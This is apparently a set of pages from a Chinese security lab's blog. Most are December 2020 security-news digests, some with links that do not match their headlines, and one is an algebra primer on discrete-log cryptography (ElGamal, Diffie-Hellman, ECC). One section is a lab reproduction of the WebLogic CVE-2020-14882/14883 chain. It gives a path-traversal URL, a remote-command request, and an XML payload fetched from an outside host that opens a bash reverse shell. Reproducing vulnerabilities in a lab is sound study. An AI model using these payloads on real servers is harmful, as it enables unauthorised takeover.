免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、SolarWinds确认可能有18,000个客户受供应链攻击影响 https://securityaffairs.co/wordpress/112294/hacking/solarwinds-sec-filing.html 2、美多个政府机构和公司因SolarWinds软件供应链攻击而被黑客入侵 https://securityaffairs.co/wordpress/112275/apt/solarwinds-supply-chain-attack.html 3、机器人流程自动化供应商UiPath披露数据泄露 https://securityaffairs.co/wordpress/112267/data-breach/uipath-data-leak.html 4、Apple修复了iOS和iPadOS的代码执行漏洞 https://www.securityweek.com/apple-patches-code-execution-flaws-ios-and-ipados 5、挪威邮轮公司Hurtigruten遭勒索软件攻击 https://www.securityweek.com/norwegian-cruise-company-hurtigruten-hit-cyberattack 6、Sophos和ReversingLabs发布了2000万样本数据集用于恶意软件研究 https://github.com/sophos-ai/SOREL-20M 7、研究人员发现新的Windows 木马窃取浏览器凭据和Outlook文件 https://threatpost.com/windows-trojan-steals-browser-credentials-outlook-files/162223/ 8、研究人员发现Steam漏洞允许远程接管用户计算机 https://www.hackread.com/steam-vulnerabilities-remote-take-over-users-computers/ 9、谷歌周一遭全球大规模宕机，YouTube和Gmail等服务中断 https://techcrunch.com/2020/12/14/gmail-youtube-google-docs-and-other-services-go-down-simultaneously-in-multiple-countries/ 10、专家发现WinZip 24的不安全通信可被黑客利用 https://cybersguards.com/insecure-communication-from-winzip-24-lets-hackers-drop-malware/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、WordPress SMTP插件中的零日漏洞被修复 https://securityaffairs.co/wordpress/112156/hacking/kerberos-bronze-bit-attack.html 2、攻击者公开了属于松下印度公司的4GB数据 https://www.zdnet.com/article/zero-day-in-wordpress-smtp-plugin-abused-to-reset-admin-account-passwords/ 3、TSYS公司遭到Conti勒索软件攻击数据泄露 https://www.govinfosecurity.com/panasonic-indias-data-released-in-extortion-plot-a-15573 4、Pay2Key勒索软件窃取了英特尔Habana Labs的数据 https://securityaffairs.co/wordpress/112258/data-breach/pay2key-hacked-habana-labs.html 5、英国地铁（Subway UK）销售系统遭黑客入侵 https://securityaffairs.co/wordpress/112248/data-breach/subway-uk-trickbot-phishing.html 6、NI控制器中的漏洞可能允许黑客远程中断生产 https://www.securityweek.com/vulnerability-ni-controller-can-allow-hackers-remotely-disrupt-production 7、研究人员发现Adrozek恶意软件劫持多种主流浏览器 https://thehackernews.com/2020/12/watch-out-adrozek-malware-hijacking.html 8、Microsoft Office安全更新修复了关键的SharePoint RCE漏洞 https://www.bleepingcomputer.com/news/security/microsoft-office-security-updates-fix-critical-sharepoint-rce-bugs/ 9、Mount Locker勒索软件为其他黑客提供双重勒索方案 https://thehackernews.com/2020/12/mount-locker-ransomware-offering-double.html 10、Facebook封禁越南APT组织海莲花相关账户 https://thehackernews.com/2020/12/facebook-tracks-apt32-oceanlotus.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、思科修复了Jabber中的严重RCE漏洞 https://securityaffairs.co/wordpress/112163/hacking/cisco-jabber-rce.html 2、Kerberos Bronze Bit攻击PoC已在线发布 https://securityaffairs.co/wordpress/112156/hacking/kerberos-bronze-bit-attack.html 3、njRAT RAT利用Pastebin 作为C2隧道来避免检测 https://securityaffairs.co/wordpress/112147/cyber-crime/njrat-rat-pastebin-c2.html 4、研究人员发现针对PDF文件的新型注入攻击技术 https://www.securityweek.com/new-injection-technique-exposes-data-pdfs 5、勒索软件攻击联网的MySQL数据库 https://www.securityweek.com/ransomware-gang-hits-exposed-mysql-databases 6、Valve修复了Steam游戏客户端中的严重漏洞 https://threatpost.com/critical-steam-flaws-crash-opponents-computers/162100/ 7、MoleRats APT使用Facebook，Dropbox作为C2隧道 https://threatpost.com/molerats-apt-espionage-facebook-dropbox/162162/ 8、攻击者利用”免费Cyberpunk 2077“进行信息收集和安装恶意软件 https://threatpost.com/free-cyberpunk-2077-downloads/161963/ 9、PGMiner：利用PostgreSQL漏洞的挖矿僵尸网络 https://unit42.paloaltonetworks.com/pgminer-postgresql-cryptocurrency-mining-botnet/ 10、星巴克移动平台中发现了远程代码执行漏洞 https://www.zdnet.com/article/remote-code-execution-vulnerability-uncovered-in-starbucks-mobile-platform/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Android 本月补丁修复 Wi-Fi 组件高危漏洞 https://threatpost.com/google-patches-critical-wi-fi-and-audio-bugs-in-android-handsets/162060/ 2、Google 将对能证明可利用性的 V8 Exploit 提供额外奖金 https://security.googleblog.com/2020/12/announcing-bonus-rewards-for-v8-exploits.html 3、D-Link路由器被发现零日漏洞 https://threatpost.com/d-link-routers-zero-day-flaws/162064/ 4、安全研究人员发现多种TCP / IP栈存在漏洞影响数百万物联网设备 https://threatpost.com/amnesia33-tcp-ip-flaws-iot-devices/161928/ 5、微软发布2020年12月更新修复58个安全漏洞 https://thehackernews.com/2020/12/microsoft-releases-windows-update-dec.html 6、APT28使用COVID-19疫苗钓鱼邮件分发Zebrocy恶意软件 https://thehackernews.com/2020/12/russian-apt28-hackers-using-covid-19-as.html 7、暗网上泄露了印度700万银行持卡人的信息 https://ciso.economictimes.indiatimes.com/news/data-of-70-lakh-indian-cardholders-leaked-on-dark-web/79640281 8、欧洲药品管理局遭到网络攻击 https://securityaffairs.co/wordpress/112125/intelligence/european-medicines-agency-cyberattack.html 9、研究人员发现了一种将信用卡窃取器隐藏在CSS文件中的新技术 https://securityaffairs.co/wordpress/112117/malware/skimmer-inside-css-files.html 10、所有Kubernetes版本均受未修补的MiTM漏洞影响 https://threatpost.com/microsoft-patch-tuesday-holidays/162041/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、大规模的网络钓鱼活动针对全球2亿多Microsoft 365用户 https://www.darkreading.com/threat-intelligence/phishing-campaign-targets-200m-microsoft-365-accounts/d/d-id/1339637 2、QNAP修复了八个可能导致NAS设备被接管的漏洞 https://securityaffairs.co/wordpress/112041/security/qnap-nas-flaws.html 3、Apache发布Struts 2安全更新修复远程代码执行漏洞 https://www.securityweek.com/possible-code-execution-flaw-apache-struts 4、网络安全公司FireEye遭攻击被盗走一系列红队工具 https://www.securityweek.com/fireeye-says-sophisticated-hacker-stole-red-team-tools 5、研究人员发现Rana Android恶意软件新变种 https://threatpost.com/rana-android-malware-updates-allow-whatsapp-telegram-im-snooping/161971/ 6、黑客强行打开莫斯科各地2732个快递寄存柜 https://www.zdnet.com/article/hacker-opens-2732-pickpoint-package-lockers-across-moscow/ 7、PlayStation Now云游戏Windows应用存在漏洞 https://www.bleepingcomputer.com/news/security/playstation-now-bugs-let-sites-run-malicious-code-on-windows-pcs/ 8、严重漏洞影响100多种GE Healthcare设备 https://www.securityweek.com/over-100-ge-healthcare-devices-affected-critical-vulnerability 9、OpenSSL发布“高危”安全补丁 https://www.securityweek.com/openssl-ships-%E2%80%98high-severity%E2%80%99-security-patch 10、安全专家披露了Microsoft Teams中一个可蠕虫零交互漏洞 https://securityaffairs.co/wordpress/112062/hacking/microsoft-teams-wormable-flaw.html

前言： 前面介绍了RSA公钥加密算法，而在公钥加密体系中，另一类重要的加密体制是基于离散对数的难解性，如ECC椭圆曲线加密、Diffie-Hellman算法、ElGamal算法等。为了解决离散对数问题，我们需要先学习《近世代数》。 本文涉及知识点实操练习——https://www.yijinglab.com/cour.do?w=1&c=c990c65e-108f-4d10-9efa-4aad77fc852b（密码学是研究如何隐密地传递信息的学科。在现代特别指对信息以及其传输的数学性研究，常被认为是数学和计算机科学的分支，和信息论也密切相关。密码学是信息安全等相关议题，如认证、访问控制的核心。） 代数基本知识: 1.群 2.环 3.域 4.有限域GF() 5.多项式环``` 群： 定义： 设G是非空集合，若在G内定义一种代数运算$\bigodot$，且满足下列4个条件，则称G（对运算$\bigodot$）构成一个群： (1) 封闭性：对任意的a,b $\epsilon$ G，恒有 a$\bigodot$b $\epsilon$ G; (2) 结合律：对任意的a,b,c $\epsilon$ G，恒有 (a$\bigodot$b)$\bigodot$c = a$\bigodot$(b$\bigodot$c) (3) 有单位元：存在e $\epsilon$ G，对任意的a $\epsilon$ G,有 a$\bigodot$e=e$\bigodot$a=a (4) 每个元存在逆元：对任意a $\epsilon$ G,存在b $\epsilon$ G,使得 a$\bigodot$b=b$\bigodot$a=e，称 b 为 a 的逆元。 其中运算 $\bigodot$ 可以是通常的乘法或者是加法。若 $\bigodot$ 为乘法，则称G为乘法群，单位元记为1.若$\bigodot$为加法，则称G为加法群，单位元记为0。一般情况下，记：$ \underbrace{a \bigodot a \bigodot \cdots \bigodot a }_{k个}=a^k$**群 G 所含元素的个数，称为该群的阶。若群G含有有限个元素，则称G为有限群，否则，为无限群。若对群G中任何a,b $\epsilon$ G，有 a $\bigodot$ b = b $\bigodot$ a，则称G为交换群或Abel群。 循环群：  定义： 设（$G,\cdot）$是一个群如果群 $G$ 中存在一个元素 $\alpha$，使得对群 $G$ 任意元素 $b$ 都存在一个整数 $i$ ,使得 $b=\alpha^i$，则我们称 $G$ 是一个循环群。元素 $\alpha$ 是 $G$ 的一个生成元 加法循环群： ---例：$（Z_6,\oplus）$是循环群，其中$Z_6=${0,1,2,3,4,5} ，$\oplus$ 为模6加法，其生成元为 1 或 5。生成元的含义可以理解为：1或5的加法，可以实现群 $Z_6$ 内所有的元素，如：5+5+.....+5 mod 6 = 5，35 mod 6 = 5 10 mod 6 = 4，40 mod 6 = 4， 15 mod 6 = 3，45 mod 6 = 3 20 mod 6 = 2，50 mod 6 = 2 25 mod 6 = 1，55 mod 6= 1 30 mod 6 = 0，60 mod 6= 0 所以通过 生成元 5 的模6的加法，可以得到群内的所有元素，实现循环群。而 2,3,4不能作为生成元，是因为这些元素的模6加法并不能得到群内所有的元素，且并不是连续循环的数。 乘法循环群也是同样的道理。 有限循环群的生成元还具有以下性质： （元素的阶）：循环群$（G,\cdot）$，$\alpha$ 为 $G$ 的一个生成元，1为 $G$ 的单位元，$G$ 的阶为 $n$ ,则：$\alpha^n=1$ 环： 定义： 若集合R上定义了两种二元运算：+(加法)及 x(乘法)，且满足下列4个条件，则称R对这两种运算构成了一个环，记为 (R,$+$,$\times$):(1) (R,$+$)是一个Abel群，其恒等元为零元，用0表示。 (2) 对任何a,b,c $\epsilon$ R，有$a\times (b \times c)=(a \times b) \times c$ (3)如果一个环(R,$+$,$\times$)还满足条件：对任意的a,b$\epsilon$ R，有$a\times b =b\times a$，则称环(R,$+$,$\times$)为交换环。 域： 定义： 设$F$是一个交换环，若$F$中的所有的非零元素对乘法都存在逆元，则称$F$为一个域。如果一个域所包含的元素是有限的则称此域是有限域，否则称为无限域。**有限域中所含元素的个数称为有限域(R,$+$,$\times$)的阶。** 有限域： 定义1： 有限域又常称为Galois域，并以GF(q)或$F_q$表示，其中q表示有限域的阶。  定义2： 设$F_1$、$F_2$是两个域，称$F_1$ 到 $F_2$ 的一个可逆映射 $\sigma$ 为一个同构(映射)，如果 $\sigma$ 是保持运算的映射，即对任意的$a,b cF_1$，有：$\sigma(a+b)=\sigma(a)+\sigma(b)$，$\sigma(a \cdot b)=\sigma(a) \cdot \sigma(b)$  定理3： 设$F$是有限域，则有： (1) 在同构的意义下，阶与$F$相同的有限域只有一个。同阶的有限域必同构。 (2)有限域 $F$的阶必为某个素数的幂. (3) 设$F$的阶为 $q=p^n$，p是一个素数，则$F$的任何一个子域的阶为$p^m$，其中m是n的因子。 (4) 记$F_q^*$为有限域$F_q$的所有非零元构成的集合，则$F_q^*$关于乘法做成一个阶为 $q-1$ 的循环群。因此，对所有的 $a\epsilon F_q$，有 $a^q=a$ 。这个群称为$F_q$的乘法群，乘法群 $F_q^*$ 的生成元称为 $F_q$ 的本原元，共有 $\phi(q-1)$ 个本原元。 (5) 设$F_q$(其中$q=p^n$)是一个有限域，则对任何 $a,b\epsilon F_q$及非负整数 $k\geqslant 0$，有：$(a+b)^{p^k}=a^{p^k}+b^{p^k}$ 多项式环： 定义： 设$F$是一个域，多项式$f(x)=a_nx^n+\cdot\cdot\cdot+a_1x+a_0$，其中$a_i\epsilon F$，$n\epsilon N$。 若$a_n \neq 0$，称n为该多项式的**次数**，称$a_n$为首项系数。 对于域 $F$ 上 $x$ 的多项式的全体组成的集合记为 $F[x]$ 。 多项式 $a(x)$ 的次数记为 $deg(a(x))$ 设存在多项式 $f(x)与g(x)$，满足： 1.加法运算： $f(x)+g(x) \epsilon F[x]$ 2.乘法运算： $f(x)\cdot g(x) \epsilon F[x]$ 容易验证 $F[x]$ 对这样定义的多项式加法与乘法构成一个交换环，称为多项式交换环。 不可约多项式： 设 $f(x)$ 是 $F[x]$ 上的一个次数大于零的多项式，如果它不能分解成两个低次数的多项式的乘积，则称 $f(x)$ 是 $F$ 上的不可约多项式。 设 $p(x)$ 是 $F[x]$ 中的 $n$ 次不可约多项式，令 $F[x]_{p(x)}$ 为 $F[x]$ 中所有次数小于 $n$ 的多项式的集合。 定义 $F[x]_{p(x)}$上的二元运算 $\oplus$ 和 $\otimes$ 如下：任取 $a(x),b(x)\epsilon F[x]_{p(x)}$， $a(x)\oplus b(x)= (a(x)+b(x)) mod$ $p(x)$ $a(x)\otimes b(x)= (a(x)\cdot b(x)) mod$ $p(x)$ 加密算法 ElGamal算法Menezes-Vanstone椭圆曲线密码体制Diffie-Hellman算法椭圆曲线上的Diffie-Hellman算法椭圆曲线加密ECC``` $Z_p$上的离散对数问题： $Z_p$上的离散对数问题是指对于循环群 $Z_p$ （p是一个素数），$\alpha \epsilon Z_p$是群 $Z_p$ 的生成元，对于任意的 $c\epsilon Z_p$，寻找唯一 的整数 $d（0\leqslant d\leqslant p-1）$满足： $C\equiv a^d (modp)$ 我们把整数 $d$ 记为 $log_{\alpha}c$，并称之为离散对数。 ElGamal算法：  背景：ElGamal是建立在解有限乘法群上的离散对数问题的困难性基础上的一种公钥密码体制。 算法描述： (1) 公开参数：取大素数 $p$ ，并取 $\alpha$ 是乘法群 $Z_p^*=$ { $1,\cdot\cdot\cdot,p-1$} 的一个生成元。 (2) 密钥生成：随机选取整数 $d$：$0 < d < (p-1)$并计算 $\beta =\alpha^d$ $mod$ $p$。 公开参数：$p 和 \alpha$ 公钥：$\beta$ 私钥：$d$(3) 加密运算：对于明文 $m$ ，选取随机整数 $k$ :$0 < k < (p-1)$，计算： $c_1=\alpha^k$ $mod$ $p$， $c_2=m\beta^k$ $mod$ $p$ 得到密文 $c=(c_1,c_2)$(4) 解密运算：对于密文 $c=(c_1,c_2)$ ，用私钥 $d$ 解密。$m=c_2(c_1^d)^{-1}$ $mod$ $p$ 计算离散对数的算法： 1. Shanks算法 2. 小步大步发（baby-step 、giant-step）算法 3. Pohlig-Hellman算法 4. 指数演算法(index-calculus) Menezes-Vanstone椭圆曲线密码体制 背景：Menezes-Vanstone椭圆曲线密码体制是ElGamal密码体制在椭圆曲线上的模拟。 算法描述： (1) 公开参数：设 $p>3$是一个素数， E是有限域 $F_p$ 上的由方程 $y^2=x^3+ax+b$表示的椭圆曲线，$E(F_p)$是相应的 Abel 群。G是 $E(F_p)$ 中具有较大素数阶 $n$ 的一个点。 (2) 生成密钥：随机选取整数 $d$ : $2\leqslant n\leqslant n-1$，计算 $P=dG$。 $d$是私钥 $P$是公钥 (3) 加密运算：对任意明文 $m=(m_1,m_2)$，随机选取一个整数 $k$：$1\leqslant k\leqslant n-1$，使得$(x,y)=kP$，满足 $x$ 与 $y$ 均为非零元素。并计算：$C_0=kG$ $c_1=m_1x$ $mod$ $p$ $c_2=m_2y$ $mod$ $p$ 得到密文为 $(C_0,c_1,c_2)$(4) 解密运算：1. 计算 $dC_0=(x,y)$2. 计算 $m_1=c_1x^{-1}$ $mod$ $p$3. 计算 $m_2=c_2y^{-1}$ $mod$ $p$即得明文为 $(m_1,m_2)$ Diffie-Hellman算法: 背景：Diffie-Hellman算法由Whitfield Diffie 和 Martin Hellman 提出，该算法的安全性也是基于一般有限域上的离散对数问题的难解性。 算法描述： (1) 假设Alice和Bob之间要建立一个共享密钥。Alice和Bob首先选定一个大素数 $p$ ，并选 $g$ 为乘法群 $F_p^*$ 中的一个生成元。 (2) Alice选取一个私钥 a(整数)：$1\leqslant a\leqslant p-2$，计算 $A=g^a$ $mod$ $p$。发送A给Bob。 (3) Bob选取一个私钥 b(整数)：$1\leqslant b\leqslant p-2$，计算 $B=g^b$ $mod$ $p$。发送B给Alice。 (4) Alice 计算 $k=B^a$ $mod$ $p$ (5) Bob 计算 $k=A^b$ $mod$ $p$因为 $B^a=(g^b)^a=g^{ab}=(g^a)^b=A^b$ $mod$ $p$，Alice与Bob计算得到的 $k$ 是相同的。这样的 $k$ 可以作为通信的共享密钥由于 $a$ 与 $b$ 是保密的，所以即使攻击者知道了 $p、g、A、B$，也很难获得 Alice 与 Bob 的共享密钥 $k$。因为攻击者要想获得 $k$ ，则需要先解决离散对数问题 $A=g^x$ $mod$ $p$ 或 $B=g^x$ $mod$ $p$ ,而这是困难的。 椭圆曲线上的Diffie-Hellman算法: (1) Alice和Bob之间要建立一个共享密钥。选取公共参数：取 $q>3$ 是某个素数幂，$E是F_q$上的椭圆曲线，$E(F_q)$ 是相应的 Abel 群，G 是 $E(F_q)$ 中的一个具有较大素数阶 $n$ 的点。 (2) Alice选取一个私钥 a(整数)：$1\leqslant a\leqslant n-2$，计算 $A=aG$ 。发送A给Bob。 (3) Bob选取一个私钥 b(整数)：$1\leqslant b\leqslant n-2$，计算 $B=bG$ 。发送B给Alice。 (4) Alice 计算 $K=aB$  (5) Bob 计算 $K=bA$ 显然 Alice 与 Bob 计算得到的 $K$ 是相同的： $aB=a(bG)=(ab)G=b(aG)=bA$K$ 即为 Alice 与 Bob 之间的共享密钥。椭圆曲线上的Diffie-Hellman密钥交换算法的安全性基于椭圆曲线上离散对数问题的难解性。 椭圆曲线密码体制 1.有限域 $F_p$ 上 $ECC$ 的加法运算规则： 设 $p>3$ 是一个素数，那么有限域 $F_p$ 上的椭圆曲线 $E$ 可以表示成方程：$y^2=x^3+ax+b(mod p)$- 椭圆曲线$E_p(a,b)$，$p$为素数，$x,y \epsilon[0,p-1]$，$y^2=x^3+ax+b$ ($mod$ $p$)这里 $a,b \epsilon F_q$，满足： $4a^3+27b^2 \neq 0 mod p$ 集合 $E(F_p)$ 中的加法运算定义为：对任何 $P=(x_1,y_1) \epsilon E(F_p)$，$Q=(x_2,y_2) \epsilon E(F_p)$1. $P+O=P$ （$O$为无穷远点）2.$P+Q=\begin{cases}O，&如果x_1=x_2,y_1=-y_2\\ \\(x_3,y_3),&否则\end{cases}$其中：$\begin{cases}x_3=\lambda^2-x_1-x_2\\y_3=\lambda(x_1-x_3)-y_1\end{cases}$ $\lambda =\begin{cases}\frac{y_2-y_1}{x_2-x_1},&如果 P\neq Q\\\\ \frac{3x_1^2+a}{2y_1},&如果P=Q \\ \end{cases}$如果 $P+Q=O$,则记 $Q=-P$ ，并称 $-P$ 为 $P$ 的负元。一般地，我们将 $\underbrace{P+P+\cdot\cdot\cdot+P}_{n次}$ 记为 $np$ ，即 $np=$ $\underbrace{P+P+\cdot\cdot\cdot+P}_{n次}$，同时，定义：$nP=O$（零元） 有限域模p 一个有限域是整数模 $p$ 的集合（integers mod p,p为素数），可表示为 $z/p$, $GF(p)$,或者 $F_p$，一般用 $F_p$。 椭圆曲线的阶 定义：一个群有多少个点叫做这个群的 “阶” （order） 2.ECC加密算法描述： 点G称为基点（base point）- $k$为私钥- $K$为公钥其中$K=kG$， $K、G$ 为椭圆曲线 $E_p(a,b)$ 上的点，**$n$ 为 $G$ 的阶** $(nG=O无穷大)$，$k$为小于$n$的整数。对于给定的$k$和$G$，根据加法法则，计算$K$很容易。而基于离散对数的难解性，给定$K$和$G$,求$k$则非常困难。 1. 公开参数：Alice选取一条椭圆曲线$E_p(a,b)$，并选取椭圆曲线上的一点，作为基点G。 2. 生成公钥：Alice 选取一个**私钥** $k$ $(k < n)$，生成**公钥** $K=kG$。 3. Alice 将$E_p(a,b)$ 和点K，G传给用户 Bob 4. 加密运算：Bob 将 **明文** 编码到 $E_p(a,b)$ 上的一点 $M$ ,取一个随机数 $r(r < n)$。 5. Bob 计算点 $C_1=M+rK$ 和 $C_2=rG$ 6. 用户Bob将 $C_1、C_2$ 传给用户 A 。 7. 解密运算： Alice计算：$M=C_1-kC_2$，将 M 解码就得到明文了。(这里:$C_1-kC_2=M+rK-k(rG)=M+rkG-rkG=M$)##  后记: 在学习ECC椭圆曲线加密等，基于离散对数难解性问题的加密算法前。我们需要先掌握好《近世代数》的知识点。因为常见的椭圆曲线加密都是在有限域内实现的，首先得知道啥是"有限域"。下一篇我会给大家演示在实战中的应用，所以基础先要打好。文中有错误的地方，欢迎读者留言指出。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Skimmer攻击团伙利用Raccoon恶意软件窃取信息 https://thehackernews.com/2020/12/payment-card-skimmer-group-using.html 2、哈萨克斯坦政府利用数字证书拦截公民HTTPS流量 https://www.zdnet.com/article/kazakhstan-government-is-intercepting-https-traffic-in-its-capital/ 3、富士康墨西哥工厂遭DoppelPaymer勒索软件攻击 https://securityaffairs.co/wordpress/112033/cyber-crime/foxconn-doppelpaymer-ransomware.html 4、Cisco Security Manager修复了可利用的RCE https://securityaffairs.co/wordpress/112023/security/cisco-security-manager-flaws.html 5、美国巴尔的摩市区医疗中心遭到勒索软件攻击 https://securityaffairs.co/wordpress/112017/malware/greater-baltimore-medical-center-ransomware.html 6、美国和澳大利亚共同开发网络攻击训练平台 https://securityaffairs.co/wordpress/111988/cyber-warfare-2/us-cyber-command-iwd-cyber-range.html 7、NSA警告称俄罗斯黑客正在利用最近修补的VMware漏洞 https://www.securityweek.com/russian-hackers-exploiting-recently-patched-vmware-flaw-nsa-warns 8、Google推出XS-Leaks知识库普及跨站泄露网络安全知识 https://www.securityweek.com/google-launches-xs-leaks-vulnerability-knowledge-base 9、RansomExx勒索软件团伙在暗网发布巴西航空工业公司数据 https://threatpost.com/ransomexx-ransomware-gang-dumps-stolen-embraer-data-report/161918/ 10、Flight Center泄露了近7000名客户的个人详细信息 https://www.zdnet.com/article/oaic-finds-flight-centre-breached-privacy-of-almost-7000-customers-in-2017/

简介   WebLogic 是美国 Oracle 公司的主要产品之一，是商业市场上主要的 J2EE 应用服务器软件，也是世界上第一个成功商业化的 J2EE 应用服务器，在 Java 应用服务器中有非常广泛的部署和应用。 本文涉及知识点实操练习——https://www.yijinglab.com/expc.do?w=exp_ass&ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c&： 通过本次实操，了解该漏洞产生的原因，掌握基本的漏洞利用及使用方法，并能给出加固方案。 概述   10 月 21 日，Oracle 官方发布数百个组件的高危漏洞公告。其中组合利用 CVE-2020-14882/CVE-2020-14883 可使未经授权的攻击者绕过 WebLogic 后台登录等限制，最终远程执行代码接管 WebLogic 服务器，利用难度极低，风险极大。    此处漏洞均存在于 WebLogic 的控制台中。该组件为 WebLogic 全版本自带组件，并且该漏洞通过 HTTP 协议进行利用。    CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0 环境搭建 此处利用vulhub的环境进行复现，新建docker-compose.yml version: '2' services: weblogic:   image: vulhub/weblogic:12.2.1.3-2018   ports:   - "7001:7001"执行以下命令会下载镜像并以此镜像启动一个容器，映射的端口为7001 docker-compose up -d 漏洞复现 权限绕过漏洞（CVE-2020-14882）复现：   因为CVE-2020-14882未授权访问漏洞是绕过管理控制台权限访问后台，所以需要存在console控制台，打开浏览器访问：   从上一步结果发现是存在管理控制台的，在正常访问console后台时会让我们输入账号密码。通过未授权访问，则可以直接绕过验证登录后台，漏洞URL：/console/css/%252e%252e%252fconsole.portal未授权访问控制台页面： 正常输入账号密码登录控制台页面： 通过对比可以看到通过未授权访问的后台与正常登陆的后台差异，由于权限不足，缺少部署等功能，无法安装应用，所以也无法通过后台部署war包等方式直接获取权限。“%252E%252E%252F”为二次url编码的“../”，通过这个就可以实现穿越路径未授权访问相关管理后台。 后台任意命令执行漏洞（CVE-2020-14883）复现: 利用方式一 com.tangosol.coherence.mvel2.sh.ShellSession 但此利用方法只能在 Weblogic 12.2.1 及以上版本利用，因为 10.3.6 并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类。 在12.2.1.3版本执行"id"命令burpsuite GET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lan Host: 192.168.74.141:7001 Pragma: no-cache cmd: id Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Cookie: ADMINCONSOLESESSION=ufkDQ2w_WXPmMBVQWCpxVBrNdKxp4L58RhydPTssNxYAmgnYP-4Y!-326883263; ADMINCONSOLESESSION=lGPJf1JPnXR7pG1qZzw0xXmwGtMQcPpJ0GVJrg0pv0LGCS6LdH0g!1599365627 Connection: close 回显payload： /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.re  在10.3.6版本执行会报错  利用方式二 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext这是一种更为通杀的方法，最早在CVE-2019-2725被提出，对于所有Weblogic版本均有效。 首先，我们需要构造一个XML文件，并将其保存在Weblogic可以访问到的服务器上，这里是执行一个反弹shell的操作，如http://example.com/rce.xml： <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">   <constructor-arg>     <list>       <value>/bin/bash</value>       <value>-c</value>       <value><![CDATA[bash -i >& /dev/tcp/ip/1234 0>&1]]></value>     </list>   </constructor-arg> </bean> </beans>nc监听，然后执行一个get请求： http://192.168.74.141:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://139.9.198.30/rce.xml")在nc监听的端口得到反弹shell 经过测试，该方法在12.2.1.3以及10.3.6版本都可以执行 漏洞修复 目前 Oracle 官方已发布了最新针对该漏洞的补丁，请受影响用户及时下载补丁程序并安装更新。Oracle 官方补丁需要用户持有正版软件的许可账号，使用该账号登陆 https://support.oracle.com 后，可以下载最新补丁。 参考链接 https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md https://github.com/jas502n/CVE-2020-14882

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、VMware 修复Workspace ONE Access 零日漏洞 https://www.securityweek.com/vmware-patches-workspace-one-access-vulnerability-reported-nsa 2、加拿大运输公司TransLink遭到勒索软件攻击 https://www.securityweek.com/metro-vancouver-transportation-agency-translink-hit-ransomware 3、LockBit勒索软件攻击了瑞士直升机制造商Kopter https://securityaffairs.co/wordpress/111998/cyber-crime/lockbit-ransomware-kopter.html 4、跨国人力资源咨询公司Randstad NV遭Egregor勒索软件攻击 https://securityaffairs.co/wordpress/111952/cyber-crime/randstad-egregor-ransomware.html 5、有人在暗网上销售辉瑞COVID-19疫苗 